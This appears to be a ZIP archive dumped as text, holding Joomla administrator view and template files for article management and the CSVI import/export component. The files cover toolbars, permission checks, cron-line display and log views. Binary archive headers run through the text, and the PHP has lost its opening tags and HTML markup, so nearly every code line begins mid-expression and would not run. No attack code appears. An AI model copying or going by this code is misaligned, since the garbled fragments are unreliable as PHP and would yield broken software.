    items as $i => $item) : ?> language && JLanguageMultilang::isEnabled()) { $tag = strlen($item->language); if ($tag == 5) { $lang = substr($item->language, 0, 2); } elseif ($tag == 6) { $lang = substr($item->language, 0, 3); } else { $lang = ""; } } elseif (!JLanguageMultilang::isEnabled()) { $lang = ""; } ?>
    pagination->getListFooter(); ?>
    escape($item->title); ?> escape($item->access_level); ?> escape($item->category_title); ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> created, JText::_('DATE_FORMAT_LC4')); ?> id; ?>
    PKEB\ܫ.&&articles/tmpl/default.phpnuW+Aget('id'); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $saveOrder = $listOrder == 'a.ordering'; ?>
    items as $i => $item) : $item->max_ordering = 0; //?? $ordering = ($listOrder == 'a.ordering'); $canCreate = $user->authorise('core.create', 'com_content.category.'.$item->catid); $canEdit = $user->authorise('core.edit', 'com_content.article.'.$item->id); $canCheckin = $user->authorise('core.manage', 'com_checkin') || $item->checked_out == $userId || $item->checked_out == 0; $canEditOwn = $user->authorise('core.edit.own', 'com_content.article.'.$item->id) && $item->created_by == $userId; $canChange = $user->authorise('core.edit.state', 'com_content.article.'.$item->id) && $canCheckin; ?>
    items, 'filesave.png', 'articles.saveorder'); ?>
    pagination->getListFooter(); ?>
    id); ?> checked_out) : ?> editor, $item->checked_out_time, 'articles.', $canCheckin); ?> escape($item->title); ?> escape($item->title); ?>

    escape($item->alias));?>

    state, $i, 'articles.', $canChange, 'cb', $item->publish_up, $item->publish_down); ?> featured, $i, $canChange); ?> escape($item->category_title); ?> pagination->orderUpIcon($i, ($item->catid == @$this->items[$i-1]->catid), 'articles.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, ($item->catid == @$this->items[$i+1]->catid), 'articles.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, ($item->catid == @$this->items[$i-1]->catid), 'articles.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, ($item->catid == @$this->items[$i+1]->catid), 'articles.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> escape($item->access_level); ?> created_by_alias) : ?> escape($item->author_name); ?>

    escape($item->created_by_alias)); ?>

    escape($item->author_name); ?>
    created, JText::_('DATE_FORMAT_LC4')); ?> hits; ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
    authorize('core.create', 'com_content') && $user->authorize('core.edit', 'com_content') && $user->authorize('core.edit.state', 'com_content')) : ?> loadTemplate('batch'); ?>
    PKEB\)articles/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKEB\Varticles/tmpl/index.htmlnuW+A PKEB\   articles/tmpl/default_batch.phpnuW+Astate->get('filter.published'); ?>

    = 0) : ?>
    PKEB\Varticles/index.htmlnuW+A PKEB\Varticle/index.htmlnuW+A PKEB\{article/tmpl/edit_metadata.phpnuW+A PKEB\Varticle/tmpl/index.htmlnuW+A PKEB\j<$''article/tmpl/edit.phpnuW+Astate->get('params'); $params = $params->toArray(); // This checks if the config options have ever been saved. If they haven't they will fall back to the original settings. $editoroptions = isset($params['show_publishing_options']); if (!$editoroptions): $params['show_publishing_options'] = '1'; $params['show_article_options'] = '1'; $params['show_urls_images_backend'] = '0'; $params['show_urls_images_frontend'] = '0'; endif; // Check if the article uses configuration settings besides global. If so, use them. if (!empty($this->item->attribs['show_publishing_options'])): $params['show_publishing_options'] = $this->item->attribs['show_publishing_options']; endif; if (!empty($this->item->attribs['show_article_options'])): $params['show_article_options'] = $this->item->attribs['show_article_options']; endif; if (!empty($this->item->attribs['show_urls_images_backend'])): $params['show_urls_images_backend'] = $this->item->attribs['show_urls_images_backend']; endif; ?>
    item->id) ? JText::_('COM_CONTENT_NEW_ARTICLE') : JText::sprintf('COM_CONTENT_EDIT_ARTICLE', $this->item->id); ?>
    • form->getLabel('title'); ?> form->getInput('title'); ?>
    • form->getLabel('alias'); ?> form->getInput('alias'); ?>
    • form->getLabel('catid'); ?> form->getInput('catid'); ?>
    • form->getLabel('state'); ?> form->getInput('state'); ?>
    • form->getLabel('access'); ?> form->getInput('access'); ?>
    • canDo->get('core.admin')): ?>
    • form->getLabel('featured'); ?> form->getInput('featured'); ?>
    • form->getLabel('language'); ?> form->getInput('language'); ?>
    • form->getLabel('id'); ?> form->getInput('id'); ?>
    form->getLabel('articletext'); ?>
    form->getInput('articletext'); ?>
    item->id, array('useCookie'=>1)); ?>
    • form->getLabel('created_by'); ?> form->getInput('created_by'); ?>
    • form->getLabel('created_by_alias'); ?> form->getInput('created_by_alias'); ?>
    • form->getLabel('created'); ?> form->getInput('created'); ?>
    • form->getLabel('publish_up'); ?> form->getInput('publish_up'); ?>
    • form->getLabel('publish_down'); ?> form->getInput('publish_down'); ?>
    • item->modified_by) : ?>
    • form->getLabel('modified_by'); ?> form->getInput('modified_by'); ?>
    • form->getLabel('modified'); ?> form->getInput('modified'); ?>
    • item->version) : ?>
    • form->getLabel('version'); ?> form->getInput('version'); ?>
    • item->hits) : ?>
    • form->getLabel('hits'); ?> form->getInput('hits'); ?>
    form->getFieldsets('attribs'); ?> $fieldSet) : ?> label), $name.'-options'); ?> description) && trim($fieldSet->description)) : ?>

    escape(JText::_($fieldSet->description));?>

      form->getFieldset($name) as $field) : ?>
    • label; ?> input; ?>
    form->getFieldset('basic-limited') as $field) : ?> input; ?>
    • form->getLabel('xreference'); ?> form->getInput('xreference'); ?>
    canDo->get('core.admin') ): ?>
      form->getFieldset('editorConfig') as $field) : ?>
    • label; ?> input; ?>
    • form->getLabel('images'); ?> form->getInput('images'); ?>
    • form->getGroup('images') as $field): ?>
    • hidden): ?> label; ?> input; ?>
    • form->getGroup('urls') as $field): ?>
    • hidden): ?> label; ?> input; ?>
    loadTemplate('metadata'); ?>
    canDo->get('core.admin')): ?>
    item->id, array('useCookie'=>1)); ?>
    form->getLabel('rules'); ?> form->getInput('rules'); ?>
    PKEB\ Karticle/tmpl/pagebreak.phpnuW+A";'."\n\t"; $script .= 'window.parent.jInsertEditorText(tag, \''.$this->eName.'\');'."\n\t"; $script .= 'window.parent.SqueezeBox.close();'."\n\t"; $script .= 'return false;'."\n"; $script .= '}'."\n"; JFactory::getDocument()->addScriptDeclaration($script); ?>
    PKEB\)article/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKEB\;g g article/view.html.phpnuW+AgetLayout() == 'pagebreak') { // TODO: This is really dogy - should change this one day. $eName = JRequest::getVar('e_name'); $eName = preg_replace( '#[^A-Z0-9\-\_\[\]]#i', '', $eName ); $document = JFactory::getDocument(); $document->setTitle(JText::_('COM_CONTENT_PAGEBREAK_DOC_TITLE')); $this->assignRef('eName', $eName); parent::display($tpl); return; } // Initialiase variables. $this->form = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); $this->canDo = ContentHelper::getActions($this->state->get('filter.category_id')); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $userId = $user->get('id'); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $userId); $canDo = ContentHelper::getActions($this->state->get('filter.category_id'), $this->item->id); JToolBarHelper::title(JText::_('COM_CONTENT_PAGE_'.($checkedOut ? 'VIEW_ARTICLE' : ($isNew ? 'ADD_ARTICLE' : 'EDIT_ARTICLE'))), 'article-add.png'); // Built the actions for new and existing records. // For new records, check the create permission. if ($isNew && (count($user->getAuthorisedCategories('com_content', 'core.create')) > 0)) { JToolBarHelper::apply('article.apply'); JToolBarHelper::save('article.save'); JToolBarHelper::save2new('article.save2new'); JToolBarHelper::cancel('article.cancel'); } else { // Can't save the record if it's checked out. if (!$checkedOut) { // Since it's an existing record, check the edit permission, or fall back to edit own if the owner. if ($canDo->get('core.edit') || ($canDo->get('core.edit.own') && $this->item->created_by == $userId)) { JToolBarHelper::apply('article.apply'); JToolBarHelper::save('article.save'); // We can save this record, but check the create permission to see if we can return to make a new one. if ($canDo->get('core.create')) { JToolBarHelper::save2new('article.save2new'); } } } // If checked out, we can still save if ($canDo->get('core.create')) { JToolBarHelper::save2copy('article.save2copy'); } JToolBarHelper::cancel('article.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_CONTENT_ARTICLE_MANAGER_EDIT'); } } PKEB\)article/.htaccessnuW+A Order allow,deny Deny from all PKEB\Vfeatured/index.htmlnuW+A PKEB\)featured/.htaccessnuW+A Order allow,deny Deny from all PKEB\epfeatured/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $state = $this->get('State'); $canDo = ContentHelper::getActions($this->state->get('filter.category_id')); JToolBarHelper::title(JText::_('COM_CONTENT_FEATURED_TITLE'), 'featured.png'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('article.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('article.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('articles.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('articles.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::divider(); JToolBarHelper::archiveList('articles.archive'); JToolBarHelper::checkin('articles.checkin'); JToolBarHelper::custom('featured.delete', 'remove.png', 'remove_f2.png', 'JTOOLBAR_REMOVE', true); } if ($state->get('filter.published') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'articles.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::trash('articles.trash'); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_content'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_CONTENT_FEATURED_ARTICLES'); } } PKEB\)featured/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKEB\bB featured/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_content.article'); $saveOrder = $listOrder == 'fp.ordering'; ?>
    items as $i => $item) : $item->max_ordering = 0; //?? $ordering = ($listOrder == 'fp.ordering'); $assetId = 'com_content.article.'.$item->id; $canCreate = $user->authorise('core.create', 'com_content.category.'.$item->catid); $canEdit = $user->authorise('core.edit', 'com_content.article.'.$item->id); $canCheckin = $user->authorise('core.manage', 'com_checkin') || $item->checked_out==$user->get('id')|| $item->checked_out==0; $canChange = $user->authorise('core.edit.state', 'com_content.article.'.$item->id) && $canCheckin; ?>
    items, 'filesave.png', 'featured.saveorder'); ?>
    pagination->getListFooter(); ?>
    id); ?> checked_out) : ?> editor, $item->checked_out_time, 'featured.', $canCheckin); ?> escape($item->title); ?> escape($item->title); ?>

    escape($item->alias));?>

    state, $i, 'articles.', $canChange, 'cb', $item->publish_up, $item->publish_down); ?> escape($item->category_title); ?> pagination->orderUpIcon($i, true, 'featured.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, true, 'featured.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, true, 'featured.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, true, 'featured.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> escape($item->access_level); ?> created_by_alias) : ?> escape($item->author_name); ?>

    escape($item->created_by_alias)); ?>

    escape($item->author_name); ?>
    created, JText::_('DATE_FORMAT_LC4')); ?> hits; ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
    PKEB\Vfeatured/tmpl/index.htmlnuW+A PKKeB\#o,,cron/index.htmlnuW+APKKeB\)cron/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,cron/tmpl/index.htmlnuW+APKKeB\9փ%%cron/tmpl/default.phpnuW+A
    cronline; ?>
    PKKeB\)cron/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\~Ocron/view.html.phpnuW+Ainput; $option = $jinput->get('option'); $data = $jinput->get($option.'.data', array(), 'array'); $from = $jinput->get('from'); // The basics of the cronline $this->cronline = 'php "'.JPATH_COMPONENT_ADMINISTRATOR.'/helpers/cron.php" username="" passwd="" '; // Construct the correct cron switch ($from) { case 'process': if (!empty($data)) { // Load the template handler $this->loadHelper('template'); // Construct the cronline $this->cronline .= $this->get('CronLine'); } else $this->cronline = JText::_('COM_CSVI_NO_CRON_DATA_FOUND'); JToolBarHelper::custom('process', 'csvi_process_32.png', 'csvi_process_32.png', JText::_('COM_CSVI_PROCESS'), false); break; case 'maintenance': // Construct the cronline $this->cronline .= $this->get('CronLineMaintenance'); JToolBarHelper::custom('maintenance', 'csvi_maintenance_32.png', 'csvi_maintenance_32.png', JText::_('COM_CSVI_MAINTENANCE'), false); break; } // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_CRON'), 'csvi_cron_48'); // Display it all parent::display($tpl); } } ?>PKKeB\ʿ&&exportfile/view.html.phpnuW+Ainput; // Process the export data $result = $this->get('ProcessData'); if (!$jinput->get('cron', false, 'bool')) { // Load the results $logresult = $this->get('Stats', 'log'); $this->assignRef('logresult', $logresult); // Load the run ID $jinput = JFactory::getApplication()->input; $csvilog = $jinput->get('csvilog', null, null); $this->assignRef('run_id', $csvilog->getId()); } // Display it all parent::display($tpl); } } ?>PKKeB\)exportfile/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\I#"h  exportfile/tmpl/default.phpnuW+Ainput; $csvilog = $jinput->get('csvilog', null, null); // Display any messages there are if (!empty($csvilog->logmessage)) echo $csvilog->logmessage; else { $filename = $jinput->get('template_name'); echo JText::sprintf('COM_CSVI_RESULTS_FOR', $filename)."\n"; echo str_repeat("=", (strlen(JText::_('COM_CSVI_RESULTS_FOR'))+strlen($filename)+1))."\n"; if (!empty($this->logresult['result'])) { echo JText::_('COM_CSVI_TOTAL')."\t\t".JText::_('COM_CSVI_RESULT')."\t\t".JText::_('COM_CSVI_STATUS')."\n"; foreach ($this->logresult['result'] as $result => $log) { echo $log->total_result."\t\t".$log->result."\t\t".JText::_('COM_CSVI_'.$log->status)."\n"; } echo JText::sprintf('COM_CSVI_SAVED_FILE', $this->logresult['file_name'])."\n"; } else echo JText::_('COM_CSVI_NO_RESULTS_FOUND')."\n"; } ?>PKKeB\#o,,exportfile/tmpl/index.htmlnuW+APKKeB\)exportfile/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,exportfile/index.htmlnuW+APKKeB\)availablefields/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,availablefields/index.htmlnuW+APKKeB\)availablefields/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,availablefields/tmpl/index.htmlnuW+APKKeB\% availablefields/tmpl/default.phpnuW+Astate->get('list.ordering'); $listDirn = $this->state->get('list.direction'); ?>
    : actions; ?> components; ?> operations; ?> name="filter_idfields" id="filter_idfields" />
    pagination->getResultsCounter(); ?>
    availablefields ); $i < $n; $i++) { $row = $this->availablefields[$i]; ?>
    pagination->getListFooter(); ?>
    pagination->getRowOffset($i); ?> csvi_name; if ($row->isprimary) echo ''.JText::_('COM_CSVI_IS_PRIMARY').''; ?> component_name; ?> component_table; ?>
    PKKeB\;6 6 availablefields/view.html.phpnuW+Aavailablefields = $this->get('Items'); // Load the pagination $this->pagination = $this->get('Pagination'); // Load the user state $this->state = $this->get('State'); if (!$this->get('FieldCheck')) Throw new Exception(JText::_('COM_CSVI_NO_AVAILABLE_FIELDS'), 0); // Get the list of actions $options = array(); $options[] = JHtml::_('select.option', 'import', JText::_('COM_CSVI_IMPORT')); $options[] = JHtml::_('select.option', 'export', JText::_('COM_CSVI_EXPORT')); $this->actions = JHtml::_('select.genericlist', $options, 'jform_options_action', 'onchange="Csvi.loadTemplateTypes();"', 'value', 'text', $this->state->get('filter.action', '')); // Get the list of supported components $this->components = JHtml::_('select.genericlist', CsviHelper::getComponents(), 'jform_options_component', 'onchange="Csvi.loadTemplateTypes();"', 'value', 'text', $this->state->get('filter.component')); // Get the list of template types $model = $this->getModel(); $templates_model = $model->getModel('templates'); $operations = $templates_model->getTemplateTypes($this->state->get('filter.action', 'import'), $this->state->get('filter.component', false)); // Create the operations list $this->operations = JHtml::_('select.genericlist', $operations, 'jform_options_operation', '', 'value', 'name', $this->state->get('filter.operation'), false, true); // Get the panel $this->loadHelper('panel'); // Show the toolbar $this->addToolbar(); // Display it all parent::display($tpl); } /** * Display the toolbar * * @copyright * @author RolandD * @todo * @see * @access protected * @param * @return * @since 3.0 */ protected function addToolbar() { JToolBarHelper::title(JText::_('COM_CSVI_AVAILABLE_FIELDS'), 'csvi_availablefields_48'); JToolBarHelper::custom('maintenance.updateavailablefields', 'csvi_availablefields_32', 'csvi_availablefields_32', JText::_('COM_CSVI_UPDATE'), false); //JToolBarHelper::help('available_fields.html', true); } } ?>PKKeB\#o,,maintenance/index.htmlnuW+APKKeB\|imaintenance/view.html.phpnuW+Acomponents = $this->get('Components'); // Get the maintenance options $this->options = $this->get('MaintenanceOptions'); $app = JFactory::getApplication(); $app->setUserState('com_csvi.global.form', false); // Load the results $jinput = JFactory::getApplication()->input; $settings = $jinput->get('settings', null, null); if ($settings->get('log.log_store', 1)) { $this->logresult = $this->get('Stats', 'log'); $this->logmessage = $this->get('StatsMessage', 'log'); } else $this->logresult = false; // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_MAINTENANCE'), 'csvi_maintenance_48'); if ($this->getLayout() != 'log') { JToolBarHelper::custom('cron.cron', 'csvi_cron_32', 'csvi_cron_32', JText::_('COM_CSVI_CRONLINE'), false); JToolBarHelper::custom('', 'csvi_continue_32.png', 'csvi_continue_32.png', JText::_('COM_CSVI_CONTINUE'), false); //JToolBarHelper::help('maintenance.html', true); } else if ($settings->get('log.log_store', 1)) { JToolBarHelper::custom('logdetails.logdetails', 'csvi_logdetails_32', 'csvi_logdetails_32', JText::_('COM_CSVI_LOG_DETAILS'), false); } // Display it all parent::display($tpl); } } ?> PKKeB\ maintenance/tmpl/icecat.phpnuW+A
    PKKeB\ $@@maintenance/tmpl/log.phpnuW+Alogresult) { ?> logresult['result']) > 0) { foreach ($this->logresult['result'] as $result => $log) { ?>
    logresult['action_type']); ?>
    total_result; ?> result; ?> status); ?>
    operation[0].'_LABEL')); echo '
    '; echo '
    '; echo JText::_('COM_CSVI_NO_LOG_EXPLAIN'); } ?> PKKeB\(maintenance/tmpl/default.phpnuW+A
    components, 'component', 'onchange=CsviMaint.loadOperation(this.value)','value', 'text', null, false, true); ?> options, 'operation', 'onchange=CsviMaint.loadOptions(this.value)'); ?>
    PKKeB\)maintenance/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,maintenance/tmpl/index.htmlnuW+APKKeB\ b+maintenance/tmpl/default_sortcategories.phpnuW+A
    • languages, 'language'); ?>
    PKKeB\maintenance/tmpl/cron.phpnuW+Ainput; $csvilog = $jinput->get('csvilog', null, null); // Display any messages there are if (!empty($csvilog->logmessage)) echo $csvilog->logmessage; else { echo JText::sprintf('COM_CSVI_RESULTS_FOR', JText::_('COM_CSVI_'.strtoupper(JRequest::getCmd('task')).'_LABEL'))."\n"; echo str_repeat("=", (strlen(JText::_('COM_CSVI_RESULTS_FOR'))+strlen(JRequest::getCmd('task'))+1))."\n"; if (!empty($this->logresult['result'])) { echo JText::_('COM_CSVI_TOTAL')."\t\t".JText::_('COM_CSVI_RESULT')."\t\t".JText::_('COM_CSVI_STATUS')."\n"; foreach ($this->logresult['result'] as $result => $log) { echo $log->total_result."\t\t".$log->result."\t\t".JText::_('COM_CSVI_'.$log->status)."\n"; } } else echo JText::_('COM_CSVI_NO_RESULTS_FOUND')."\n"; } ?>PKKeB\w)$maintenance/tmpl/availablefields.phpnuW+A
    PKKeB\# #maintenance/tmpl/default_icecat.phpnuW+A
    PKKeB\lNQ""maintenance/view.raw.phpnuW+AloadTemplate('icecat'); break; case 'sortcategories': $this->languages = $this->get('Languages'); echo $this->loadTemplate('sortcategories'); break; } } } ?> PKKeB\)maintenance/.htaccessnuW+A Order allow,deny Deny from all PKKeB\(G$ $ maintenance/view.json.phpnuW+Ainput; $task = strtolower($jinput->get('task')); switch ($task) { case 'icecatindex': case 'updateavailablefields': JToolBarHelper::custom('cancelimport', 'csvi_cancel_32', 'csvi_cancel_32', JText::_('COM_CSVI_CANCEL'), false); // Display it all parent::display($tpl); break; case 'icecatsingle': $this->get('IcecatSingle'); $result['view'] = ''; // Get the number of records processed $result['records'] = $jinput->get('linesprocessed', 0, 'int'); if ($jinput->get('finished', false, 'bool')) { $result['process'] = false; $result['url'] = JURI::root().'administrator/index.php?option='.$jinput->get('option').'&task=logdetails.logdetails&run_id[]='.$jinput->get('run_id', 0, 'int'); } else { $result['process'] = true; } // Output the results echo json_encode($result); break; case 'updateavailablefieldssingle': $continue = $this->get('AvailableFieldsSingle', 'availablefields'); $result['view'] = ''; // Get the number of records processed $result['table'] = $jinput->get('updatetable', '', 'string'); if (!$continue) { $result['process'] = false; $result['url'] = JURI::root().'administrator/index.php?option='.$jinput->get('option').'&task=logdetails.logdetails&run_id='.$jinput->get('run_id', 0, 'int'); // Store the log results $this->get('finishProcess'); } else { $result['process'] = true; } // Output the results echo json_encode($result); break; } } } ?> PKKeB\)logdetails/.htaccessnuW+A Order allow,deny Deny from all PKKeB\ //logdetails/view.html.phpnuW+Alogmessage = $this->get('Items'); $this->setModel(JModel::getInstance('log', 'CsviModel')); $this->logresult = $this->get('Stats', 'log'); // Load the pagination $this->pagination = $this->get('Pagination'); // Load the user state $this->state = $this->get('State'); // Set the Run ID $jinput = JFactory::getApplication()->input; $this->run_id = $jinput->get('run_id', 0, 'int'); // Set the actions $this->list['actions'] = $this->get('Actions'); $this->list['results'] = $this->get('Results'); // Get the panel $this->loadHelper('panel'); // Add toolbar JToolBarHelper::title(JText::_('COM_CSVI_LOG_DETAILS'), 'csvi_logdetails_48'); JToolBarHelper::custom('logdetails.cancel', 'csvi_cancel_32', 'csvi_cancel_32', JText::_('COM_CSVI_BACK'), false); // Display it all parent::display($tpl); } } ?> PKKeB\)logdetails/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\.؍logdetails/tmpl/default.phpnuW+Astate->get('list.ordering'); $listDirn = $this->state->get('list.direction'); ?>
    logresult['action_type'])); ?>
    logresult['file_name']; ?>
    logresult['total_records']; ?>
    logresult['run_cancelled']) ? JText::_('COM_CSVI_YES') : JText::_('COM_CSVI_NO'); ?>
    logresult['debug']; ?>
    logresult['debugview'])) { echo '
    '.$this->logresult['debugview'].'
    '; } ?>
    logresult['result'])) { ?> logresult['result'] as $result => $log) { ?>
    total_result; ?> result; ?> status)); ?>
    list['actions']; ?> list['results']; ?>
    pagination->getResultsCounter(); ?>
    logmessage) { foreach ($this->logmessage as $key => $log) { ?>
    pagination->getListFooter(); ?>
    line; ?> status)); ?> result)); ?> description); ?>
    PKKeB\logdetails/tmpl/index.htmlnuW+APKKeB\logdetails/index.htmlnuW+APKKeB\)csvi/.htaccessnuW+A Order allow,deny Deny from all PKKeB\csvi/tmpl/default.phpnuW+A
    cpanel_images->process; ?> cpanel_images->replacements; ?> cpanel_images->log; ?> cpanel_images->maintenance; ?>
    cpanel_images->availablefields; ?> cpanel_images->settings; ?> cpanel_images->about; ?> cpanel_images->help; ?> cpanel_images->install; ?>
    PKKeB\#o,,csvi/tmpl/index.htmlnuW+APKKeB\)csvi/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#cWWcsvi/view.html.phpnuW+Aauthorise('core.admin', 'com_csvi')) { JToolBarHelper::preferences('com_csvi'); } //JToolBarHelper::help('control_panel.html', true); // Assign data for display $helper = new CsviHelper(); $this->cpanel_images = $helper->getButtons(); // Display the page parent::display($tpl); } } ?> PKKeB\#o,,csvi/index.htmlnuW+APKKeB\Z Z templatetype/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Toolbar for product editing * * @copyright * @author RolandD * @todo * @see * @access protected * @param * @return void * @since 1.0 */ protected function addToolbar() { // Hide the mainmenu JRequest::setVar('hidemainmenu', true); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $user->get('id')); JToolBarHelper::title(JText::_('COM_CSVI_PAGE_'.($checkedOut ? 'VIEW_TEMPLATETYPE' : ($isNew ? 'ADD_TEMPLATETYPE' : 'EDIT_TEMPLATETYPE'))), 'csvi_templates_48.png'); if (!$checkedOut) { JToolBarHelper::apply('templatetype.apply', 'JTOOLBAR_APPLY'); JToolBarHelper::save('templatetype.save', 'JTOOLBAR_SAVE'); JToolBarHelper::custom('templatetype.save2new', 'save-new.png', 'save-new_f2.png', 'JTOOLBAR_SAVE_AND_NEW', false); } // If an existing item, can save to a copy. if (!$isNew) { JToolBarHelper::custom('templatetype.save2copy', 'save-copy.png', 'save-copy_f2.png', 'JTOOLBAR_SAVE_AS_COPY', false); } if (empty($this->item->id)) { JToolBarHelper::cancel('templatetype.cancel', 'JTOOLBAR_CANCEL'); } else { JToolBarHelper::cancel('templatetype.cancel', 'JTOOLBAR_CLOSE'); } } } ?>PKKeB\KЗ((templatetype/tmpl/edit.phpnuW+A
    • form->getLabel('template_type_name'); ?> form->getInput('template_type_name'); ?>
    • form->getLabel('template_type'); ?> form->getInput('template_type'); ?>
    • form->getLabel('component'); ?> form->getInput('component'); ?>
    • form->getLabel('options'); ?> form->getInput('options'); ?>
    • form->getLabel('url'); ?> form->getInput('url'); ?>
    PKKeB\wtWtemplatetype/tmpl/index.htmlnuW+APKKeB\)templatetype/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,templatetype/index.htmlnuW+APKKeB\)templatetype/.htaccessnuW+A Order allow,deny Deny from all PKKeB\)replacements/.htaccessnuW+A Order allow,deny Deny from all PKKeB\)replacements/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,replacements/tmpl/index.htmlnuW+APKKeB\(Ch  replacements/tmpl/default.phpnuW+Astate->get('list.ordering'); $listDirn = $this->state->get('list.direction'); ?>
    items)) { foreach ($this->items as $i => $item) { ?>
    pagination->getListFooter(); ?>
    id); ?> checked_out) { echo JHtml::_('jgrid.checkedout', $i, $item->editor, $item->checked_out_time, 'replacements.'); echo $this->escape($item->name); } else { ?> escape($item->name); ?> findtext, 0, 100); if (strlen($item->findtext) > 100) echo '...';?> replacetext, 0, 100); if (strlen($item->replacetext) > 100) echo '...'; ?> method; ?>
    PKKeB\ƫreplacements/view.html.phpnuW+Aitems = $this->get('Items'); // Get the pagination $this->pagination = $this->get('Pagination'); // Load the user state $this->state = $this->get('State'); // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_REPLACEMENTS'), 'csvi_replacement_48'); JToolBarHelper::addNew('replacement.add'); JToolBarHelper::editList('replacement.edit'); JToolBarHelper::deleteList('', 'replacements.delete'); //JToolBarHelper::help('about.html', true); // Display it all parent::display($tpl); } } ?>PKKeB\#o,,replacements/index.htmlnuW+APKKeB\#o,,templatetypes/tmpl/index.htmlnuW+APKKeB\,c c templatetypes/tmpl/default.phpnuW+Astate->get('list.ordering'); $listDirn = $this->state->get('list.direction'); ?>
    templatetypes as $i => $template) { ?>
    pagination->getListFooter(); ?>
    id); ?> url)) echo JHtml::_('link', JRoute::_($template->url), JText::_('COM_CSVI_'.$template->template_type_name), 'target="_blank"'); else echo JText::_('COM_CSVI_'.$template->template_type_name); ?> template_type_name).'_DESC'); ?> component), $template->component, 'target="_blank"'); ?> template_type)); ?>
    PKKeB\)templatetypes/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKKeB\)templatetypes/.htaccessnuW+A Order allow,deny Deny from all PKKeB\#o,,templatetypes/index.htmlnuW+APKKeB\똢77templatetypes/view.html.phpnuW+Atemplatetypes = $this->get('Items'); // Get the pagination $this->pagination = $this->get('Pagination'); // Load the user state $this->state = $this->get('State'); // Get the panel $this->loadHelper('panel'); // Show the toolbar JToolBarHelper::title(JText::_('COM_CSVI_TEMPLATETYPES'), 'csvi_templates_48'); JToolBarHelper::custom('templatetype.add', 'new.png', 'new_f2.png','JTOOLBAR_NEW', false); JToolBarHelper::custom('templatetype.edit', 'edit.png', 'edit_f2.png','JTOOLBAR_EDIT', true); //JToolBarHelper::help('about.html', true); // Display it all parent::display($tpl); } } ?>PKKeB\GY Y replacement/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Toolbar for product editing * * 